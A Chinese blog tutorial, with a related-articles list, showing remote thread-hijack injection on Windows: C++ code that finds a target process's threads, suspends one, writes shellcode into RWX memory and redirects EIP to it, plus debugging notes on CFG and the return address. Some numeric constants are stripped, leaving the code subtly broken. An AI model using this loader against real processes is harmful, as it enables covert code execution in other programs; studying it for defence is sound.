https://www.cnblogs.com/theseventhson/p/13199381.html 上次分享了通过APC注入方式,让目标线程运行shellcode。这么做有个前提条件:目标线程是alertable的,否则注入了也不会立即被执行,直到状态改为alertable,但笔者暂时没找到能把目标线程状态主动改为alertable的办法,所以只能被动“听天由命”地等。今天介绍另一种远程线程注入的方式:hook 线程;

  先说第一种思路,如下:

  核心代码解析如下:

  1、用于测试的目标进程:这里写个死循环,让其一直运行,方便随时被注入;

#include <windows.h>

#include <stdio.h>

int main()

{

    printf("dead looping...............\n");

    while (TRUE)

    {

    }

}

  注意:本人测试环境:

  win10 x64为了确保安全,默认增加了很多防护,比如控制流防护CFG,编译的时候需要手动改成否,才能让我们注入的shellcode顺利执行;

  

  2、遍历进程,找到目标进程后再遍历该进程名下其他线程:

HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS | TH32CS_SNAPTHREAD, );

    HANDLE victimProcess = NULL;

    PROCESSENTRY32 processEntry = { sizeof(PROCESSENTRY32) };

    THREADENTRY32 threadEntry = { sizeof(THREADENTRY32) };

    std::vector<DWORD> threadIds;

    HANDLE threadHandle = NULL;

    if (Process32First(snapshot, &processEntry)) {

        while (_wcsicmp(processEntry.szExeFile, L"Thread_Alertable.exe") != ) {

        //while (_wcsicmp(processEntry.szExeFile, L"explorer.exe") != 0) {

            Process32Next(snapshot, &processEntry);

        }

    }

    victimProcess = OpenProcess(PROCESS_ALL_ACCESS, , processEntry.th32ProcessID);

    if (Thread32First(snapshot, &threadEntry)) {

        do {

            if (threadEntry.th32OwnerProcessID == processEntry.th32ProcessID) {

                threadIds.push_back(threadEntry.th32ThreadID);

            }

        } while (Thread32Next(snapshot, &threadEntry));

    }

    for (DWORD threadId : threadIds) {

        threadHandle = OpenThread(THREAD_ALL_ACCESS, NULL, threadId);

        if (Wow64SuspendThread(threadHandle) == -) //挂起线程失败

        {

            continue;

        }

        printf("threadId:%d\n", threadId);

        if (InjectThread(victimProcess, threadHandle,buf, shellcodeSize))

        {

            printf("threadID = %d inject success!", threadId);

            CloseHandle(victimProcess);

            CloseHandle(threadHandle);

            break;

        }

    }

  3、shellcode代码注入,思路也简单:之前已经已经拿到目标进程和目标线程的句柄,并且已经暂定线程,这里直接GetThreadContext,更改eip为shellcode地址即可;

BOOL InjectThread(HANDLE hProcess, HANDLE hThread, unsigned char buf[],int shellcodeSize)

{

    LPVOID shellAddress = VirtualAllocEx(hProcess, NULL, shellcodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

    if (shellAddress == NULL)

    {

        printf("VirtualAlloc Error\n");

        VirtualFreeEx(hProcess, shellAddress, , MEM_RELEASE );

        ResumeThread(hThread);

        return FALSE;

    }

    WOW64_CONTEXT ctx = {  };

    ctx.ContextFlags = CONTEXT_ALL;

    if (!Wow64GetThreadContext(hThread, &ctx))

    {

        int a = GetLastError();

        printf("GetThreadContext Error:%d\n", a);

        VirtualFreeEx(hProcess, shellAddress, , MEM_RELEASE);

        ResumeThread(hThread);

        return FALSE;

    }

    DWORD currentEIP = ctx.Eip;

    if (WriteProcessMemory(hProcess, (LPVOID)shellAddress, buf, shellcodeSize, NULL) == )

    {

        VirtualFreeEx(hProcess, shellAddress, , MEM_RELEASE);

        printf("write shellcode error\n");

        ResumeThread(hThread);

        return FALSE;

    }

    ctx.Eip = (DWORD)shellAddress;//让eip指向shellcode

    if (!Wow64SetThreadContext(hThread, &ctx))

    {

        VirtualFreeEx(hProcess, shellAddress, , MEM_RELEASE);

        printf("set thread context error\n");

        ResumeThread(hThread);

        return FALSE;

    }

    ResumeThread(hThread);

    return TRUE;

}

效果:弹出了messagebox:

也在目标进程的目录下生成了文件:

  4、最后做一些总结:

  • 为了让被注入的目标进程一直运行,刚开始用了sleep,从process hacker看能正常suspend,但无法resume,shellcode也无法执行;后来改成死循环,能正常执行shellcode了;
  • shellcode执行完后,从打印的数据来看,貌似又从main开始运行,如下:

    

    从process hacker看,线程并未改变,还是之前的那个:

    

    那么问题来了,shellcode执行完回到主线程后为啥又执行了打印代码?仔细想想,shellcode最后一条有效指令是C3,也就是ret,该指令把栈顶4个字节作为返回地址赋值给eip;既然dead looping打印了两次,说明执行shellcode执行前栈顶被压入了这行代码的地址,这是谁干的了?用IDA打开目标进程分析,如下:

    

    好在自己写的测试进程不复杂,很容易找到答案,分析如下:

(1)由于cpu执行速度很快,注入shellcode的进程(以下简称loader)在执行suspendThread时大概率已经进入while死循环,从上面汇编代码来看,while循环并未改变堆栈,所以shellcdoe执行完后ret的地址肯定不是while循环更改的;

(2)继续往上倒推:add esp,4 这是进入死循环最后一行改变栈顶的代码,为了更直观说明,我画了一个堆栈图,对照代码如下:

            

    从函数入口点开始,改变堆栈,期间有两个call和一个push,这3行指令会改变esp;最后执行完add esp,4后,esp重新指向原edi;shellcode最后一行ret执行时,会从堆栈中该值弹出赋值给eip。那么原edi值又是多少了?用调试器打开测试进程,在main入口断下,发现edi指向的时EntryPoint,也就是说shellcode最后一个ret指令会跳转到这里开始执行;

        

这里也能看到栈顶是EntryPoint的地址:

  5、 这次注入shellcode虽说成功,问题也很明显:

  • 手动关闭了CFG检查,但实际情况是CFG默认是开启的,导致shellcode可能无法执行
  • 没有设置返回地址,shellcode执行完,返回地址无法控制(这里只是凑巧回到了原EntryPoint);因suspendThread是随机的,context的eip也是随机的,所以shellcode执行完后返回地址也是随机的,这点在shellode无法写死,只能动态获取;我曾经尝试在shellcode末尾添加push+ret方式返回,但suspend的地址可能包含很多00,通过字符串操作的时候可能会被截断,暂时没想到好的解决办法;
  • 类似explorer这种系统进程,GetThreadContex大概率会失败,可能做了保护;

     后续会通过其他方案挨个解决这些问题!

windows:shellcode 远程线程hook/注入(一)的更多相关文章

  1. windows:shellcode 远程线程hook/注入(三)

    今天介绍第三种远程执行shellcode的思路:函数回调: 1.所谓回调,简单理解: windows出厂时,内部有很多事务的处理无法固化(无法100%预料外部会遇到哪些情况),只能留下一堆的接口,让开 ...

  2. windows:shellcode 远程线程hook/注入(二)

    https://www.cnblogs.com/theseventhson/p/13218651.html   上次分享了基本的远程注入方法,遗留了一个问题:shellcode执行完后怎么回到线程su ...

  3. windows:shellcode 远程线程hook/注入(五)

    前面几篇文章介绍了通过APC注入.进程注入.windows窗口处理函数回调.kernercallback回调执行shellcode,今天继续介绍通过heap Spray(翻译成中文叫堆喷射)执行she ...

  4. windows:shellcode 远程线程hook/注入(四)

    https://www.cnblogs.com/theseventhson/p/13236421.html  这里介绍了利用回调函数执行shellcode的基本原理:这里介绍另外一种利用回调执行she ...

  5. 《windows核心编程系列》十九谈谈使用远程线程来注入DLL。

    windows内的各个进程有各自的地址空间.它们相互独立互不干扰保证了系统的安全性.但是windows也为调试器或是其他工具设计了一些函数,这些函数可以让一个进程对另一个进程进行操作.虽然他们是为调试 ...

  6. 使用远程线程来注入DLL

    使用远程线程来注入DLL DLL注入技术要求我们目标进程中的一个线程调用LoadLibrary来载入我们想要的DLL (1)用OpenProcess函数打开目标进程(2)用VirtualAllocEx ...

  7. 【windows核心编程】远程线程DLL注入

    15.1 DLL注入 目前公开的DLL注入技巧共有以下几种: 1.注入表注入 2.ComRes注入 3.APC注入 4.消息钩子注入 5.远线程注入 6.依赖可信进程注入 7.劫持进程创建注入 8.输 ...

  8. 实现远程线程DLL注入

    ### 32位:远程线程注入 远程线程注入是最常用的一种注入技术,该技术利用的核心API是 `CreateRemoteThread()` 这个API可以运行远程线程,其次通过创建的线程调用 `Load ...

  9. Dll注入:X86/X64 远程线程CreateRemoteThread 注入

    远线程注入原理是利用Windows 系统中CreateRemoteThread()这个API,其中第4个参数是准备运行的线程,我们可以将LoadLibrary()填入其中,这样就可以执行远程进程中的L ...

随机推荐

  1. 「疫期集训day5」火焰

    我们就像一把穿刺敌人的利刃,把敌人开肠破肚----凡尔登高地前气势汹汹的德军 今天没有考试,挺好,有时间自己做题了 今天主要复习+学习了数据结构,列了个表: 已完成:单调队列,线段树,set/vect ...

  2. [NOI2003]逃学的小孩 (贪心+树的直径+暴力枚举)

    Input 第一行是两个整数N(3 <= N <= 200000)和M,分别表示居住点总数和街道总数.以下M行,每行给出一条街道的信息.第i+1行包含整数Ui.Vi.Ti(1<=Ui ...

  3. 蓝桥杯大学B组省赛2020模拟赛(一)题解与总结

    题目链接:https://www.jisuanke.com/contest/6516 A:题目: 我们称一个数是质数,而且数位中出现了 5 的数字是有趣的. 例如 5, 59, 457.求1到1000 ...

  4. 一篇夯实一个知识点系列--python装饰器

    写在前面 本系列目的:希望可以通过一篇文章,不望鞭辟入里,但求在工程应用中得心应手. 装饰器模式是鼎鼎大名的23种设计模式之一.装饰器模式可以在不改变原有代码结构的情况下,扩展代码功能. Python ...

  5. java IO流 (七) 对象流的使用

    1.对象流: ObjectInputStream 和 ObjectOutputStream2.作用:ObjectOutputStream:内存中的对象--->存储中的文件.通过网络传输出去:序列 ...

  6. Flask 基础组件(三):路由系统

    1. 常见路由 @app.route('/user/<username>') @app.route('/post/<int:post_id>') @app.route('/po ...

  7. JVM系列-方法调用的原理

    JVM系列-方法调用的原理 最近重新看了一些JVM方面的笔记和资料,收获颇丰,尤其解决了长久以来心中关于JVM方法管理的一些疑问.下面介绍一下JVM中有关方法调用的知识. 目的 方法调用,目的是选择方 ...

  8. 【RPA Starter第二课】Introduction to the UiPath Enterprise Platform UiPath企业平台简介

    Introduction to the UiPath Enterprise Platform UiPath 企业平台简介 课程目标: 了解UiPath实现RPA的步骤 描述每个UiPath解决方案的关 ...

  9. Azure 提供负载均衡(一)Azure Traffic Manager 为我们的Web项目提供负载均衡

    一,引言 上一篇讲到我们将自己的Net Core Web 项目部署到 Azure 的 Web App 的一项 pass 服务,假如随着项目的日益增长的访问量,之前部署到单节点的应用可能无法保证其稳定性 ...

  10. scrapyd+gerapy的项目部署

    scrapyd+gerapy的项目部署: 简单学习,后续跟进完善 声明: 1)仅作为个人学习,如有冒犯,告知速删! 2)不想误导,如有错误,不吝指教! 环境配置: scrapyd下载: pip ins ...